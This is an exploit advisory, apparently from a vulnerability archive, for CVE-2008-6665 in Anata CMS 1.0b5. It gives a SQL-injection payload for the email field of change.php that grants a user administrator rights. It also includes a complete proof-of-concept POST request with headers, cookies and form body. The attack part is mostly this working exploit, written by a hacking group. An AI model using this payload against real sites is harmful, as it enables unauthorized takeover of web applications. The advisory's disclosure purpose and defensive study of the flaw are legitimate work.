Anata CMS 1.0b5 (change.php) Arbitrary Add Admin Vulnerability

2009.04.11
Credit: CWH
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-6665
CWE: CWE-94


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

=============================================== Anata CMS 1.0b5 Arbitrary Add-Admin Exploit =============================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 15 June 2008 SITE : www.citec.us ##################################################### APPLICATION : Ananta CMS VERSION : 1.0 BETA 5 VENDOR : http://www.anantasoft.com DOWNLOAD : http://downloads.sourceforge.net/ananta ##################################################### ---Add-Admin Exploit--- ***magic_quotes_gpc = off*** ------------- Description ------------- Anata CMS 1.0b5 have Vulnerability to escalate user to administartor's privilege. That Vulnerable in "Change Profile Sections" (http://[Target]/[ananta_path]/change.php) and you can injection code into form,This action will give your account can use Admin Control Panel (http://[Target]/[ananta_path]/admin/index.php?Menus) with Administrative's Privilege. ----------------- Vulnerable Path ----------------- [+] http://[Target]/[ananta_path]/change.php -------------- Exploit code -------------- [+] hacked@nasa',`activate`='',`active`='1',`admin`='2 ----- POC ----- [+] POST http://192.168.24.25/ananta/change.php HTTP/1.1 [+] Host: 192.168.24.25 [+] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 [+] Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 [+] Accept-Language: en-us,en;q=0.5 [+] Accept-Encoding: gzip,deflate [+] Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 [+] Keep-Alive: 300 [+] Proxy-Connection: keep-alive [+] Referer: http://192.168.24.25/ananta/change.php [+] Cookie: my_forums_read=a%3A1%3A%7Bi%3A2%3Bi%3A1213371672%3B%7D; SESSf8957b3b4f8e7726a55030f2edf0908f=b4accdd2e21350171a6f7770b7c01ea1; my_topicsRead=a%3A2%3A%7Bi%3A1%3Bi%3A1213371648%3Bi%3A2%3Bi%3A1213371760%3B%7D; fusion_visited=yes; PHPSESSID=b5a2857e687d69984cc6a38feb7a4a70 [+] Content-Type: application/x-www-form-urlencoded [+] Content-length: 108 [+] [+] name=test&pass=test&controle=test&email=hacked@nasa',`activate`='',`active`='1',`admin`='2&showemail=on&save=Save&table=users&number=4&active=1 ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ##################################################################

References:

http://xforce.iss.net/xforce/xfdb/43119
http://www.securityfocus.com/bid/29752
http://www.milw0rm.com/exploits/5824


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top